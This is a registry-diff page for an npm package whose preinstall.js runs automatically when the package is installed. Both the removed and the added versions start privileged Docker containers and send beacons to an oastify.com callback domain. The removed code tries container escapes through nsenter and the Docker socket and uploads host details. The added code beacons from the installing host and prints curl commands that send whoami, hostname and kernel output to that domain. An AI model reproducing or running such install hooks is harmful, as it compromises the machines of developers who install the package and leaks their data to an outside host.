npm - rank4222wun - Versions diffs - 1.0.37 → 1.0.38 - Mend

rank4222wun 1.0.37 → 1.0.38

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (4) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.37",
+  "version": "1.0.38",
   "description": "",
   "main": "index.js",
   "scripts": {

package/preinstall.js CHANGED Viewed

@@ -1,882 +1,137 @@
-// privileged-container-oast.js
-const { exec, spawn } = require('child_process');
-const fs = require('fs');
-const path = require('path');
-const https = require('https');
-const dns = require('dns');
+// privileged-container-oast-simple.js
+const { spawn, exec } = require('child_process');
 const crypto = require('crypto');
+const https = require('https');
+const OAST_DOMAIN = 'v84zr5z8jz4cr781u5eyl6cgv71ypudj.oastify.com';
 console.log(`
-╔══════════════════════════════════════════════════════════╗
-║      PRIVILEGED CONTAINER WITH OAST REPORTING           ║
-║      OAST Domain: v84zr5z8jz4cr781u5eyl6cgv71ypudj.oastify.com ║
-╚══════════════════════════════════════════════════════════╝
+╔════════════════════════════════════════════════════╗
+║          PRIVILEGED CONTAINER + OAST               ║
+║                                                    ║
+║  OAST Domain : ${OAST_DOMAIN}  ║
+╚════════════════════════════════════════════════════╝
 `);
-// ===================== CONFIGURATION =====================
-const CONFIG = {
-  OAST: {
-    domain: 'v84zr5z8jz4cr781u5eyl6cgv71ypudj.oastify.com',
-    httpsPort: 443,
-    httpPort: 80,
-    apiKey: crypto.randomBytes(16).toString('hex'),
-    sessionId: `priv-container-${Date.now()}-${crypto.randomBytes(4).toString('hex')}`
-  },
-  DOCKER: {
-    image: 'ubuntu:latest',
-    command: '/bin/bash',
-    privileged: true,
-    interactive: true,
-    remove: false,
-    name: `priv-container-${Date.now()}`
-  },
-  SCAN: {
-    hostEscape: true,
-    networkScan: true,
-    fileAccess: true,
-    capabilityCheck: true
-  }
-};
-// ===================== OAST FUNCTIONS =====================
-class OASTReporter {
-  constructor() {
-    this.interactions = [];
-    this.reports = [];
-  }
-  sendDNS(subdomain, data = {}) {
-    const dnsName = `${subdomain}.${CONFIG.OAST.sessionId}.${CONFIG.OAST.domain}`;
-    dns.lookup(dnsName, (err) => {
-      if (!err) {
-        const interaction = {
-          type: 'DNS',
-          timestamp: new Date().toISOString(),
-          subdomain: subdomain,
-          dnsName: dnsName,
-          data: data
-        };
-        this.interactions.push(interaction);
-        console.log(`📡 DNS OAST sent: ${dnsName}`);
-      }
-    });
-  }
-  sendHTTP(endpoint, data) {
-    const postData = JSON.stringify({
-      sessionId: CONFIG.OAST.sessionId,
-      timestamp: new Date().toISOString(),
-      ...data
-    });
-    const options = {
-      hostname: CONFIG.OAST.domain,
-      port: CONFIG.OAST.httpPort,
-      path: endpoint,
-      method: 'POST',
-      headers: {
-        'Content-Type': 'application/json',
-        'X-Session-ID': CONFIG.OAST.sessionId,
-        'User-Agent': 'PrivilegedContainerScanner/1.0'
-      }
-    };
-    const req = http.request(options, (res) => {
-      let body = '';
-      res.on('data', chunk => body += chunk);
-      res.on('end', () => {
-        const interaction = {
-          type: 'HTTP',
-          timestamp: new Date().toISOString(),
-          endpoint: endpoint,
-          status: res.statusCode,
-          response: body,
-          data: data
-        };
-        this.interactions.push(interaction);
-        console.log(`📡 HTTP OAST sent (${res.statusCode}): ${endpoint}`);
-      });
-    });
-    req.on('error', () => {});
-    req.write(postData);
-    req.end();
-  }
-  sendHTTPS(endpoint, data) {
-    const postData = JSON.stringify({
-      sessionId: CONFIG.OAST.sessionId,
-      timestamp: new Date().toISOString(),
-      ...data
-    });
-    const options = {
-      hostname: CONFIG.OAST.domain,
-      port: CONFIG.OAST.httpsPort,
-      path: endpoint,
-      method: 'POST',
-      headers: {
-        'Content-Type': 'application/json',
-        'X-Session-ID': CONFIG.OAST.sessionId,
-        'X-Report-Type': 'privileged_container',
-        'User-Agent': 'ContainerEscapeDetector/2.0'
-      }
-    };
-    const req = https.request(options, (res) => {
-      let body = '';
-      res.on('data', chunk => body += chunk);
-      res.on('end', () => {
-        const interaction = {
-          type: 'HTTPS',
-          timestamp: new Date().toISOString(),
-          endpoint: endpoint,
-          status: res.statusCode,
-          response: body,
-          data: data
-        };
-        this.interactions.push(interaction);
-        this.reports.push(interaction);
-        console.log(`📡 HTTPS OAST sent (${res.statusCode}): ${endpoint}`);
-      });
-    });
-    req.on('error', (e) => {
-      console.log(`⚠️  OAST error (may be expected): ${e.message}`);
-    });
+function generateSessionId() {
+  const timestamp = Date.now();
+  const random = crypto.randomBytes(6).toString('hex');
+  return `sess-${timestamp}-${random}`;
+}
-    req.write(postData);
-    req.end();
-  }
+const sessionId = generateSessionId();
+const uniqueSub = crypto.randomBytes(4).toString('hex'); // لعمل subdomain فريد
-  async reportContainerEscape(containerId, evidence) {
-    const report = {
-      containerId: containerId.substring(0, 12),
-      escapeConfirmed: evidence.escaped || false,
-      confidence: evidence.confidence || 0,
-      methods: evidence.methods || [],
-      proofPoints: evidence.proofPoints || [],
-      hostInfo: evidence.hostInfo || {},
-      timestamp: new Date().toISOString()
-    };
+console.log(`Session ID       : ${sessionId}`);
+console.log(`Unique subdomain : ${uniqueSub}.${sessionId}.${OAST_DOMAIN}\n`);
-    // إرسال عبر HTTPS
-    this.sendHTTPS('/privileged-container-escape', report);
+function sendSimpleHttpsBeacon(path = '/start', extraData = {}) {
+  const data = JSON.stringify({
+    session: sessionId,
+    ts: new Date().toISOString(),
+    type: 'beacon',
+    ...extraData
+  });
-    // إرسال DNS notification
-    if (evidence.escaped) {
-      this.sendDNS('escape-confirmed', {
-        container: containerId.substring(0, 12),
-        confidence: evidence.confidence
-      });
+  const options = {
+    hostname: OAST_DOMAIN,
+    port: 443,
+    path: path,
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(data),
+      'User-Agent': 'PrivContainerTest/1.0',
+      'X-Session': sessionId
     }
+  };
-    // حفظ محلياً
-    this.saveLocalReport(report);
+  const req = https.request(options, (res) => {
+    res.on('data', () => {}); // نكتفي بالرد
+  });
-    return report;
-  }
+  req.on('error', (e) => {
+    console.log(`[beacon error] ${e.message}`);
+  });
-  saveLocalReport(report) {
-    const filename = `oast-report-${CONFIG.OAST.sessionId}.json`;
-    const allReports = {
-      sessionId: CONFIG.OAST.sessionId,
-      domain: CONFIG.OAST.domain,
-      timestamp: new Date().toISOString(),
-      reports: this.reports,
-      containerReport: report
-    };
+  req.write(data);
+  req.end();
-    fs.writeFileSync(filename, JSON.stringify(allReports, null, 2));
-    console.log(`💾 Report saved locally: ${filename}`);
-  }
+  console.log(`→ HTTPS beacon sent to https://${OAST_DOMAIN}${path}`);
 }
-// ===================== CONTAINER SCANNER =====================
-class PrivilegedContainerScanner {
-  constructor() {
-    this.containerId = null;
-    this.oastReporter = new OASTReporter();
-    this.evidence = {
-      escaped: false,
-      confidence: 0,
-      methods: [],
-      proofPoints: [],
-      hostInfo: {},
-      containerInfo: {}
-    };
-  }
-  async run() {
-    try {
-      console.log('🚀 Starting privileged container analysis...\n');
-      // إرسال بداية الجلسة إلى OAST
-      this.oastReporter.sendHTTPS('/session-start', {
-        action: 'privileged_container_start',
-        config: CONFIG
-      });
-      // 1. تشغيل الحاوية المميزة
-      await this.runPrivilegedContainer();
-      // 2. جمع المعلومات الأساسية
-      await this.collectBasicInfo();
-      // 3. محاولة الهروب والتأكيد
-      await this.attemptEscape();
-      // 4. فحص إضافي للحاوية
-      await this.performDeepScan();
-      // 5. تحليل النتائج
-      await this.analyzeResults();
-      // 6. إرسال التقرير النهائي
-      await this.sendFinalReport();
-      // 7. عرض النتائج
-      this.displayResults();
-      // 8. تنظيف (اختياري)
-      await this.cleanup();
-    } catch (error) {
-      console.error(`❌ Error: ${error.message}`);
-      this.oastReporter.sendHTTPS('/error', { error: error.message });
-    }
-  }
-  async runPrivilegedContainer() {
-    console.log('📦 Running privileged container...');
-    const dockerArgs = [
-      'run',
-      '--privileged',
-      '-d',
-      '--name', CONFIG.DOCKER.name,
-      CONFIG.DOCKER.image,
-      'sleep', '3600'
-    ];
-    return new Promise((resolve, reject) => {
-      exec(`docker ${dockerArgs.join(' ')}`, (error, stdout, stderr) => {
-        if (error) {
-          reject(error);
-          return;
-        }
-        this.containerId = stdout.trim();
-        console.log(`✅ Container started: ${this.containerId.substring(0, 12)}`);
-        // إرسال إلى OAST
-        this.oastReporter.sendHTTPS('/container-started', {
-          containerId: this.containerId.substring(0, 12),
-          name: CONFIG.DOCKER.name,
-          image: CONFIG.DOCKER.image,
-          privileged: true
-        });
-        // الانتظار للحاوية لتبدأ
-        setTimeout(resolve, 2000);
-      });
-    });
-  }
-  async collectBasicInfo() {
-    console.log('\n🔍 Collecting basic container information...');
-    const commands = [
-      // معلومات النظام
-      'cat /etc/os-release',
-      'uname -a',
-      'whoami',
-      'id',
-      // الصلاحيات
-      'capsh --print 2>/dev/null || echo "No capsh"',
-      'cat /proc/self/status | grep -i cap',
-      // نظام الملفات
-      'ls -la /',
-      'mount | head -20',
-      'df -h',
-      // الذاكرة والمعالج
-      'free -h',
-      'cat /proc/cpuinfo | grep "model name" | head -1',
-      // الشبكة
-      'ip addr show',
-      'hostname -I',
-      'cat /etc/hosts',
-      // معلومات Docker
-      'cat /proc/1/cgroup 2>/dev/null || echo "No cgroup access"',
-      'ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"'
-    ];
-    const results = {};
-    for (const cmd of commands) {
-      try {
-        const output = await this.execInContainer(cmd);
-        results[cmd] = output.substring(0, 500);
-        // تحليل بعض النتائج الهامة
-        if (cmd.includes('os-release')) {
-          this.evidence.containerInfo.os = output;
-        }
-        if (cmd.includes('uname -a')) {
-          this.evidence.containerInfo.kernel = output;
-        }
-        if (cmd.includes('capsh')) {
-          this.evidence.containerInfo.capabilities = output;
-        }
-      } catch (error) {
-        results[cmd] = `ERROR: ${error.message}`;
-      }
-    }
-    // إرسال المعلومات الأساسية إلى OAST
-    this.oastReporter.sendHTTPS('/basic-info', {
-      containerId: this.containerId.substring(0, 12),
-      basicInfo: results
-    });
-    return results;
-  }
+// إرسال إشارة بداية من الـ host نفسه
+sendSimpleHttpsBeacon('/start', { action: 'script_started' });
-  async attemptEscape() {
-    console.log('\n🔓 Attempting container escape...');
-    const escapeTests = [
-      {
-        name: 'nsenter_escape',
-        command: 'which nsenter && nsenter --target 1 --mount -- sh -c "echo HOST_HOSTNAME:$(cat /etc/hostname 2>/dev/null) && echo CONTAINER_HOSTNAME:$(hostname)" 2>/dev/null || echo "FAILED"',
-        check: (output) => output.includes('HOST_HOSTNAME') && output.includes('CONTAINER_HOSTNAME')
-      },
-      {
-        name: 'proc_escape',
-        command: 'cat /proc/1/status 2>/dev/null | head -5 && cat /proc/1/cmdline 2>/dev/null | tr "\\0" " " | head -c 100',
-        check: (output) => output.includes('State:') && output.length > 20
-      },
-      {
-        name: 'host_mounts',
-        command: 'ls -la /home 2>/dev/null || ls -la /root 2>/dev/null || cat /etc/passwd 2>/dev/null | head -5 || echo "NO_ACCESS"',
-        check: (output) => !output.includes('NO_ACCESS') && output.length > 10
-      },
-      {
-        name: 'docker_socket',
-        command: 'ls -la /var/run/docker.sock 2>/dev/null && echo "EXISTS" || echo "NOT_EXISTS"',
-        check: (output) => output.includes('EXISTS')
-      },
-      {
-        name: 'network_escape',
-        command: 'ip route show 2>/dev/null | head -5 && ip neigh show 2>/dev/null | head -5',
-        check: (output) => output.includes('default via') || output.includes('lladdr')
-      }
-    ];
-    for (const test of escapeTests) {
-      try {
-        const output = await this.execInContainer(test.command);
-        if (test.check(output)) {
-          this.evidence.methods.push(test.name);
-          console.log(`✅ ${test.name}: Possible`);
-          // إرسال إلى OAST
-          this.oastReporter.sendHTTPS('/escape-attempt', {
-            method: test.name,
-            success: true,
-            output: output.substring(0, 300)
-          });
-          // التحقق من اختلاف hostname لـ nsenter
-          if (test.name === 'nsenter_escape') {
-            const lines = output.split('\n');
-            let hostHostname = '';
-            let containerHostname = '';
-            lines.forEach(line => {
-              if (line.startsWith('HOST_HOSTNAME:')) {
-                hostHostname = line.replace('HOST_HOSTNAME:', '').trim();
-              }
-              if (line.startsWith('CONTAINER_HOSTNAME:')) {
-                containerHostname = line.replace('CONTAINER_HOSTNAME:', '').trim();
-              }
-            });
-            if (hostHostname && containerHostname && hostHostname !== containerHostname) {
-              this.evidence.proofPoints.push(`Host hostname (${hostHostname}) differs from container (${containerHostname})`);
-              this.evidence.hostInfo.hostname = hostHostname;
-              this.evidence.escaped = true;
-            }
-          }
-        }
-      } catch (error) {
-        console.log(`❌ ${test.name}: Failed - ${error.message}`);
-      }
-    }
-  }
-  async performDeepScan() {
-    if (!CONFIG.SCAN.hostEscape) return;
-    console.log('\n🔬 Performing deep scan...');
-    const deepChecks = [
-      // محاولة إنشاء حاوية من داخل الحاوية
-      {
-        name: 'nested_container',
-        command: 'which docker && docker ps 2>/dev/null || which podman && podman ps 2>/dev/null || echo "NO_CONTAINER_RUNTIME"',
-        check: (output) => !output.includes('NO_CONTAINER_RUNTIME')
-      },
-      // فحص kernel vulnerabilities
-      {
-        name: 'kernel_check',
-        command: 'uname -r && grep -i "dirty\\|cow\\|shock\\|overlay" /etc/os-release 2>/dev/null || echo "NO_VULN_INFO"',
-        check: (output) => output.length > 5
-      },
-      // محاولة كتابة ملف في نظام المضيف
-      {
-        name: 'host_write_test',
-        command: 'echo "TEST_WRITE_FROM_CONTAINER" > /tmp/container_test.txt 2>/dev/null && echo "WRITE_SUCCESS" || echo "WRITE_FAILED"',
-        check: (output) => output.includes('WRITE_SUCCESS')
-      },
-      // فحص mount points خطيرة
-      {
-        name: 'dangerous_mounts',
-        command: 'mount 2>/dev/null | grep -E "(proc|sys|dev|/var/run)" | head -10',
-        check: (output) => output.length > 10
-      }
-    ];
-    for (const check of deepChecks) {
-      try {
-        const output = await this.execInContainer(check.command);
-        if (check.check(output)) {
-          console.log(`⚠️  ${check.name}: Found potential issue`);
-          // إرسال إلى OAST
-          this.oastReporter.sendDNS(check.name, {
-            result: output.substring(0, 100)
-          });
-        }
-      } catch (error) {
-        // تجاهل الأخطاء
-      }
-    }
-  }
+// ────────────────────────────────────────────────
-  async analyzeResults() {
-    console.log('\n📊 Analyzing results...');
-    // حساب مستوى الثقة
-    let confidence = 0;
-    // نقاط لكل طريقة هروب محتملة
-    const methodPoints = {
-      nsenter_escape: 30,
-      proc_escape: 25,
-      host_mounts: 20,
-      docker_socket: 25,
-      network_escape: 15
-    };
-    this.evidence.methods.forEach(method => {
-      confidence += methodPoints[method] || 10;
-    });
-    // نقاط إضافية لأدلة قاطعة
-    if (this.evidence.proofPoints.length > 0) {
-      confidence += this.evidence.proofPoints.length * 10;
-    }
-    // إذا كان hostname مختلف
-    if (this.evidence.hostInfo.hostname) {
-      confidence += 20;
-    }
-    // تحديد إذا تم الهروب فعلاً
-    this.evidence.confidence = Math.min(100, confidence);
-    if (this.evidence.confidence >= 60) {
-      this.evidence.escaped = true;
-      console.log(`🚨 CONFIRMED: Container escape possible (${this.evidence.confidence}% confidence)`);
-    } else if (this.evidence.confidence >= 30) {
-      console.log(`⚠️  POSSIBLE: Container escape may be possible (${this.evidence.confidence}% confidence)`);
-    } else {
-      console.log(`✅ SECURE: Container appears isolated (${this.evidence.confidence}% confidence)`);
-    }
-  }
+console.log(`
+تشغيل الحاوية المميزة الآن...
+(إضغط Ctrl+C للإنهاء - سيظهر تنظيف بسيط)
-  async sendFinalReport() {
-    console.log('\n📡 Sending final report to OAST...');
-    const report = {
-      sessionId: CONFIG.OAST.sessionId,
-      containerId: this.containerId ? this.containerId.substring(0, 12) : 'unknown',
-      timestamp: new Date().toISOString(),
-      evidence: this.evidence,
-      summary: {
-        escaped: this.evidence.escaped,
-        confidence: this.evidence.confidence,
-        methods: this.evidence.methods,
-        proofPoints: this.evidence.proofPoints
-      }
-    };
-    // إرسال التقرير النهائي
-    this.oastReporter.reportContainerEscape(this.containerId, this.evidence);
-    // إرسال DNS notification للنتيجة
-    const resultType = this.evidence.escaped ? 'escape-confirmed' : 'no-escape';
-    this.oastReporter.sendDNS(resultType, {
-      confidence: this.evidence.confidence,
-      methods: this.evidence.methods.length
-    });
-    return report;
-  }
+أوامر مفيدة نفذها داخل الحاوية لاختبار الـ OAST:
-  displayResults() {
-    console.log('\n' + '='.repeat(80));
-    console.log('📊 PRIVILEGED CONTAINER ANALYSIS RESULTS');
-    console.log('='.repeat(80));
-    console.log(`\n📦 Container ID: ${this.containerId ? this.containerId.substring(0, 12) : 'unknown'}`);
-    console.log(`📍 OAST Domain: ${CONFIG.OAST.domain}`);
-    console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}`);
-    console.log(`\n🎯 Escape Status: ${this.evidence.escaped ? '🚨 CONFIRMED' : '✅ NOT CONFIRMED'}`);
-    console.log(`📈 Confidence Level: ${this.evidence.confidence}%`);
-    if (this.evidence.methods.length > 0) {
-      console.log(`\n🔓 Possible Escape Methods:`);
-      this.evidence.methods.forEach((method, i) => {
-        console.log(`   ${i + 1}. ${method}`);
-      });
-    }
-    if (this.evidence.proofPoints.length > 0) {
-      console.log(`\n🎯 Evidence Found:`);
-      this.evidence.proofPoints.forEach((proof, i) => {
-        console.log(`   ${i + 1}. ${proof}`);
-      });
-    }
-    if (this.evidence.hostInfo.hostname) {
-      console.log(`\n🖥️  Host Information:`);
-      console.log(`   Hostname: ${this.evidence.hostInfo.hostname}`);
-    }
-    console.log(`\n📡 OAST Interactions: ${this.oastReporter.interactions.length} interactions sent`);
-    console.log(`   DNS: ${this.oastReporter.interactions.filter(i => i.type === 'DNS').length}`);
-    console.log(`   HTTPS: ${this.oastReporter.interactions.filter(i => i.type === 'HTTPS').length}`);
-    console.log('\n🔍 Check your OAST dashboard for detailed evidence:');
-    console.log(`   Session ID: ${CONFIG.OAST.sessionId}`);
-    console.log(`   Look for interactions at: ${CONFIG.OAST.domain}`);
-    console.log('\n' + '='.repeat(80));
-    console.log('🎯 ANALYSIS COMPLETE');
-    console.log('='.repeat(80));
-  }
+1. اختبار DNS (أكثر موثوقية):
+   nslookup ${uniqueSub}.${sessionId}.${OAST_DOMAIN} || true
-  async cleanup() {
-    if (this.containerId) {
-      console.log('\n🧹 Cleaning up container...');
-      try {
-        await this.execOnHost(`docker stop ${this.containerId}`);
-        await this.execOnHost(`docker rm ${this.containerId}`);
-        console.log('✅ Container cleaned up');
-        // إرسال إشعار التنظيف إلى OAST
-        this.oastReporter.sendHTTPS('/cleanup', {
-          containerId: this.containerId.substring(0, 12),
-          action: 'container_removed'
-        });
-      } catch (error) {
-        console.log(`⚠️  Could not clean up container: ${error.message}`);
-      }
-    }
-  }
+   أو (إذا ما فيش nslookup):
+   ping -c 1 -W 1 ${uniqueSub}.${sessionId}.${OAST_DOMAIN} || true
-  execInContainer(command) {
-    return new Promise((resolve, reject) => {
-      if (!this.containerId) {
-        reject(new Error('No container running'));
-        return;
-      }
-      exec(`docker exec ${this.containerId} sh -c "${command.replace(/"/g, '\\"')}"`,
-        { timeout: 10000 },
-        (error, stdout, stderr) => {
-          if (error) {
-            reject(error);
-          } else {
-            resolve(stdout || stderr || '');
-          }
-        }
-      );
-    });
-  }
+2. اختبار HTTP/HTTPS بسيط:
+   curl -s "https://${OAST_DOMAIN}/ping?session=${sessionId}&from=container" || true
-  execOnHost(command) {
-    return new Promise((resolve, reject) => {
-      exec(command, { timeout: 10000 }, (error, stdout, stderr) => {
-        if (error) {
-          reject(error);
-        } else {
-          resolve(stdout);
-        }
-      });
-    });
-  }
-}
+3. إرسال معلومات سريعة (مثال):
+   whoami | curl -d @- "https://${OAST_DOMAIN}/whoami?session=${sessionId}"
-// ===================== SIMPLE VERSION =====================
-function runSimplePrivilegedWithOAST() {
-  console.log('🚀 Running simple privileged container with OAST reporting...\n');
-  const containerName = `simple-priv-${Date.now()}`;
-  const sessionId = `simple-${Date.now()}-${crypto.randomBytes(4).toString('hex')}`;
-  // إرسال بداية الجلسة
-  const startReq = https.request({
-    hostname: CONFIG.OAST.domain,
-    port: CONFIG.OAST.httpsPort,
-    path: '/simple-start',
-    method: 'POST',
-    headers: {
-      'Content-Type': 'application/json',
-      'X-Session-ID': sessionId
-    }
-  });
-  startReq.write(JSON.stringify({
-    action: 'simple_container_start',
-    containerName: containerName,
-    timestamp: new Date().toISOString()
-  }));
-  startReq.end();
-  // تشغيل الحاوية
-  const dockerArgs = [
-    'run',
-    '--privileged',
-    '--name', containerName,
-    '--rm',
-    CONFIG.DOCKER.image,
-    'sh', '-c',
-    `
-    echo "=== PRIVILEGED CONTAINER STARTED ==="
-    echo "Session: ${sessionId}"
-    echo "Hostname: $(hostname)"
-    echo "User: $(whoami)"
-    echo "=== TESTING ESCAPE ==="
-    # Test nsenter
-    which nsenter && echo "nsenter: AVAILABLE" || echo "nsenter: NOT_AVAILABLE"
-    # Test host access
-    cat /proc/1/status 2>/dev/null | head -2 && echo "Host proc: ACCESSIBLE" || echo "Host proc: NO_ACCESS"
-    # Send DNS notification
-    nslookup ${sessionId}.simple-test.${CONFIG.OAST.domain} 2>/dev/null || echo "DNS test"
-    echo "=== CONTAINER COMPLETE ==="
-    `
-  ];
-  console.log(`Running: docker ${dockerArgs.join(' ')}`);
-  const dockerProcess = spawn('docker', dockerArgs, { stdio: 'inherit' });
-  dockerProcess.on('close', (code) => {
-    console.log(`\n✅ Container exited with code: ${code}`);
-    // إرسال إشعار الانتهاء
-    const endReq = https.request({
-      hostname: CONFIG.OAST.domain,
-      port: CONFIG.OAST.httpsPort,
-      path: '/simple-end',
-      method: 'POST',
-      headers: {
-        'Content-Type': 'application/json',
-        'X-Session-ID': sessionId
-      }
-    });
-    endReq.write(JSON.stringify({
-      action: 'simple_container_end',
-      exitCode: code,
-      timestamp: new Date().toISOString()
-    }));
-    endReq.end();
-    console.log(`\n📡 Check OAST for interactions: ${CONFIG.OAST.domain}`);
-    console.log(`🔑 Session ID: ${sessionId}`);
-  });
-}
+4. إرسال hostname + kernel:
+   (echo "host=$(hostname)  kernel=$(uname -r)" | curl -d @- "https://${OAST_DOMAIN}/info?session=${sessionId}") || true
-// ===================== INTERACTIVE VERSION =====================
-function runInteractivePrivileged() {
-  console.log('🚀 Running interactive privileged container...\n');
-  console.log(`📡 OAST Domain: ${CONFIG.OAST.domain}`);
-  console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}\n`);
-  // إرسال إشعار البدء
-  const req = https.request({
-    hostname: CONFIG.OAST.domain,
-    port: CONFIG.OAST.httpsPort,
-    path: '/interactive-start',
-    method: 'POST',
-    headers: {
-      'Content-Type': 'application/json',
-      'X-Session-ID': CONFIG.OAST.sessionId
-    }
-  });
-  req.write(JSON.stringify({
-    action: 'interactive_container_start',
-    timestamp: new Date().toISOString(),
-    command: 'docker run --privileged -it ubuntu:latest /bin/bash'
-  }));
-  req.end();
-  // تشغيل الحاوية التفاعلية
-  console.log('💻 Starting interactive bash session...');
-  console.log('   You can test commands manually.');
-  console.log('   Try these commands to test escape:');
-  console.log('   - nsenter --target 1 --mount -- sh -c "hostname"');
-  console.log('   - cat /proc/1/status');
-  console.log('   - ls -la /var/run/docker.sock');
-  console.log('   - nslookup test.${CONFIG.OAST.sessionId}.${CONFIG.OAST.domain}\n');
-  const dockerProcess = spawn('docker', [
-    'run',
-    '--privileged',
-    '-it',
-    '--name', `interactive-${CONFIG.OAST.sessionId}`,
-    CONFIG.DOCKER.image,
-    CONFIG.DOCKER.command
-  ], {
-    stdio: 'inherit'
-  });
-  dockerProcess.on('close', (code) => {
-    console.log(`\n🔚 Container exited with code: ${code}`);
-    // إرسال إشعار الانتهاء
-    const endReq = https.request({
-      hostname: CONFIG.OAST.domain,
-      port: CONFIG.OAST.httpsPort,
-      path: '/interactive-end',
-      method: 'POST',
-      headers: {
-        'Content-Type': 'application/json',
-        'X-Session-ID': CONFIG.OAST.sessionId
-      }
-    });
-    endReq.write(JSON.stringify({
-      action: 'interactive_container_end',
-      exitCode: code,
-      timestamp: new Date().toISOString()
-    }));
-    endReq.end();
-    // تنظيف
-    exec(`docker rm interactive-${CONFIG.OAST.sessionId} 2>/dev/null || true`);
-    console.log(`\n📡 Check OAST interactions at: ${CONFIG.OAST.domain}`);
-    console.log(`🔑 Use Session ID: ${CONFIG.OAST.sessionId}`);
-  });
-  // التعامل مع Ctrl+C
-  process.on('SIGINT', () => {
-    console.log('\n\n⚠️  Received Ctrl+C, cleaning up...');
-    dockerProcess.kill('SIGINT');
-  });
-}
+ملاحظة: ubuntu:latest قد لا تحتوي curl افتراضياً في بعض الإصدارات المصغرة.
+إذا لم يعمل curl → جرب:
+   apt update && apt install -y curl 2>/dev/null || true
-// ===================== MAIN FUNCTION =====================
-async function main() {
-  console.log('🎯 Choose scanning method:');
-  console.log('   1. Full analysis with automated scanning and OAST reporting');
-  console.log('   2. Simple container with basic OAST reporting');
-  console.log('   3. Interactive privileged container (docker run --privileged -it ubuntu:latest /bin/bash)');
-  console.log('   4. Exit');
-  const readline = require('readline').createInterface({
-    input: process.stdin,
-    output: process.stdout
-  });
-  readline.question('\nSelect option: ', async (choice) => {
-    readline.close();
-    switch(choice.trim()) {
-      case '1':
-        const scanner = new PrivilegedContainerScanner();
-        await scanner.run();
-        break;
-      case '2':
-        runSimplePrivilegedWithOAST();
-        break;
-      case '3':
-        runInteractivePrivileged();
-        break;
-      default:
-        console.log('👋 Exiting');
-        process.exit(0);
-    }
-  });
-}
+جاري التشغيل...
+`);
-// ===================== CHECK DOCKER =====================
-if (require.main === module) {
-  // التحقق من Docker
-  exec('which docker', (error) => {
-    if (error) {
-      console.error('❌ Docker is not installed or not in PATH');
-      process.exit(1);
-    }
-    exec('docker ps', (error) => {
-      if (error && error.message.includes('permission denied')) {
-        console.error('❌ Permission denied for Docker');
-        console.log('   Try: sudo usermod -aG docker $USER');
-        console.log('   Then logout and login again');
-        process.exit(1);
-      }
-      console.log(`✅ Docker is available`);
-      console.log(`📍 OAST Domain: ${CONFIG.OAST.domain}`);
-      console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}\n`);
-      // بدء البرنامج
-      main();
-    });
+// ────────────────────────────────────────────────
+const dockerArgs = [
+  'run',
+  '--privileged',
+  '-it',
+  '--rm',
+  '--name', `priv-test-${sessionId.slice(0,12)}`,
+  'ubuntu:latest',
+  '/bin/bash'
+];
+const container = spawn('docker', dockerArgs, {
+  stdio: 'inherit'
+});
+container.on('error', (err) => {
+  console.error(`خطأ في تشغيل docker: ${err.message}`);
+  process.exit(1);
+});
+container.on('close', (code) => {
+  console.log(`\nالحاوية انتهت (exit code: ${code})\n`);
+  // إشارة نهاية
+  sendSimpleHttpsBeacon('/end', {
+    action: 'container_exited',
+    exit_code: code
   });
-}
-module.exports = { PrivilegedContainerScanner, CONFIG };
+  console.log(`\nتحقق من لوحة الـ OAST الخاصة بك على:\n`);
+  console.log(`  https://${OAST_DOMAIN}`);
+  console.log(`  ابحث عن: ${sessionId}\n`);
+  console.log(`أو subdomain: ${uniqueSub}.${sessionId}.${OAST_DOMAIN}\n`);
+});
+// التعامل مع Ctrl+C
+process.on('SIGINT', () => {
+  console.log('\nإغلاق... (Ctrl+C مرة أخرى للخروج فوراً)');
+  container.kill('SIGINT');
+  setTimeout(() => process.exit(0), 1500);
+});

package/rank4222wun-1.0.38.tgz ADDED Viewed

Binary file

package/rank4222wun-1.0.37.tgz DELETED Viewed

Binary file